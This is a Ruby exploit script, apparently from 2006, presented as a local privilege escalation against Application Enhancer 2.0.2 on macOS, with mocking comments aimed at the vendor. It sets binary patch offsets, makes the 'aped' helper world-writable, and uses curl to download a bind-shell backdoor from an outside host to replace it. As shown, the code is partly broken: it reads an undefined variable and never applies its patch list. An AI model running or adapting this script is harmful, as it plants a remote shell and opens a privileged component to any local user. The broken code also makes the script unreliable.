Application Enhancer (APE) 2.0.2 - Local Privilege Escalation Exploit
# !/usr/bin/ruby
# Exploit Of The Apes: A practical pwnage for Application (UN)Enhancer aka APU
# (c) 2006 LMH <lmh [at] info-pull.com> and Johnny Pwnerseed.
#
# This goes dedicated to #macdev. For the childish flaming and great brain lag.
#
# Lesson: Don't talk about stuff you have NFC about. And don't insult
# people. Once you do it, and get pwned, total lulz ensues ;o(
#
# MD5 (ApplicationEnhancer) = cf9bf1fa74f8298f09aedce38c72a7da
# at offset 27512 0x807d0014 -> 0x38600000
# at offset 115586 0x8b4614890424 -> 0x31c090890424
#
require 'fileutils'
# Define offsets to opcodes to be patched
PATCH_INSTRUCTIONS = [
[ 27512, "\x38\x60\x00\x00" ],
[ 115586, "\x31\xc0\x90\x89\x04\x24" ]
]
BACKDOO_URL = "http://projects.info-pull.com/moab/bug-files/sample-back" # must be fat binary, sample bind shell
PATH_TO_APE = "/Library/Frameworks/ApplicationEnhancer.framework"
PATH_TO_APU = "/Library/Frameworks/ApplicationUnenhancer.framework"
puts "++ Starting: #{PATH_TO_APE}"
puts "++ Back-up: #{PATH_TO_APU}"
# Move the original framework to back-up, copy contents back, set permissions.
# To repair:
# rm -rf /Library/Frameworks/ApplicationEnhancer.framework
# mv /Library/Frameworks/ApplicationUnenhancer.framework \
# /Library/Frameworks/ApplicationEnhancer.framework
if File.exists?(PATH_TO_APE)
unless File.exists?(PATH_TO_APU)
FileUtils.mv(PATH_TO_APE, PATH_TO_APU)
FileUtils.cp_r(PATH_TO_APU, PATH_TO_APE)
system "chmod u+w #{File.join(PATH_TO_APE, "Versions/A/ApplicationEnhancer")}"
end
end
# Patching poor Apu (we could just replace the binary, but this is cooler as the
# guys at Unsanity, LLC think they can dropriv and forget all about flawed code...).
bozo = File.read(path_to_bozo)
aped_path = File.join(PATH_TO_APE, "Resources/aped")
system "chmod a+rxw #{aped_path}" # let everyone backdoor it afterwards, be social and share!
system "curl #{BACKDOO_URL} -o #{aped_path}"
system "chmod a+x #{aped_path}"
